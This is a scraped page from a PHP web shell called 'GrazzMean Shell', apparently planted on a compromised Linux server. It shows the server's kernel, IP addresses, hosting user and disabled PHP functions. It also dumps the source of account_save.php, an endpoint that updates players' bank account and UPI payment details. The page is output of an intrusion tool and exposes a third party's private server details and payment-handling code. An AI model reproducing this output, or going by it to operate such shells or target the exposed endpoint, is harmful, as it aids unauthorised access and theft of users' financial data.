shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : account_save.php
<?php
//function autoload
    // function __autoload($class)
    //     {
    //         include("../admin_login/classess/".$class.".php");
    //     }
        spl_autoload_register(function($class) {
  include("../admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
        
            if(isset($_POST['acc_num']) && isset($_POST['ifsc']) && isset($_POST['holder_name']) && isset($_POST['pin']) && isset($_POST['token']))
            {
                $acc_num = $_POST['acc_num'];
                $ifsc = $_POST['ifsc'];
                $holder_name = $_POST['holder_name'];
                $bank_name = $_POST['bank_name'];
                $city = $_POST['city'];
                $pincode = $_POST['pincode'];
                $gpay = $_POST['gpay'];
                $phonepay = $_POST['phonepay'];
                $paytm = $_POST['paytm'];
                $secretKey = $_POST['pin'];
                $deviceToken = $_POST['token'];
                $mobile = $_POST['mobile'];
                $p_id = $admin->verifyCredentials3($deviceToken, $secretKey,$mobile);
                            if($p_id)
                            {
                                $cnd = "p_id = '$p_id'";
                                $data = array(
                                        "acc_num" =>$acc_num,
                                        "ifsc"=>$ifsc,
                                        "holder_name"=>$holder_name,
                                        "bank_name"=>$bank_name,
                                        "city"=>$city,
                                        "pincode"=>$pincode,
                                        "gpay"=>$gpay,
                                        "phonepay"=>$phonepay,
                                        "paytm"=>$paytm,
                                    );
                                    
                                    if($sqlfun->updated("player",$data,$cnd)){
                                        echo json_encode(array("res"=>"success","msg"=>"updated successfully","data"=>new stdClass()));
                                    }
                            }
                            else
                            {
                                echo json_encode(array("res"=>"failure","msg"=>"not valid","data"=>new stdClass()));
                            }
            }
        ?>
© 2026 GrazzMean